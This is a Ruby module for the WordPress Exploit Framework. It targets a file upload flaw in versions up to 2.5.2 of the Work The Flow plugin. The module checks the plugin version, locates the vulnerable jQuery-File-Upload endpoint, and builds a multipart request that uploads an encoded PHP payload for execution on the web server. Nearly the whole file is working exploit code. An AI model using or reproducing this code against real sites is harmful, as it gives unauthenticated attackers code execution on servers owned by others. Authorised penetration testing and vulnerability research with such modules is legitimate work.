# frozen_string_literal: true

class Wpxf::Exploit::WorkTheFlowShellUpload < Wpxf::Module
  include Wpxf::WordPress::ShellUpload

  def initialize
    super

    update_info(
      name: 'Work The Flow Shell Upload',
      desc: 'This module exploits a file upload vulnerability in versions '\
            '<= 2.5.2 of the Work The Flow plugin which '\
            'allows unauthenticated users to upload and execute PHP scripts '\
            'in the context of the web server.',
      author: [
        'Claudio Viviani', # Vulnerability discovery
        'rastating'        # WPXF module
      ],
      references: [
        ['WPVDB', '7883'],
        ['EDB', '36640']
      ],
      date: 'Mar 14 2015'
    )
  end

  def check
    check_plugin_version_from_readme('work-the-flow-file-upload', '2.5.3')
  end

  def plugin_url
    normalize_uri(
      wordpress_url_plugins,
      'work-the-flow-file-upload',
      'public',
      'assets',
      'jQuery-File-Upload-9.5.0',
      'server',
      'php'
    )
  end

  def uploader_url
    normalize_uri(plugin_url, 'index.php')
  end

  def uploaded_payload_location
    normalize_uri(plugin_url, 'files', payload_name)
  end

  def payload_body_builder
    builder = Utility::BodyBuilder.new
    builder.add_field('action', 'upload')
    builder.add_file_from_string('files', payload.encoded, payload_name)
    builder
  end
end
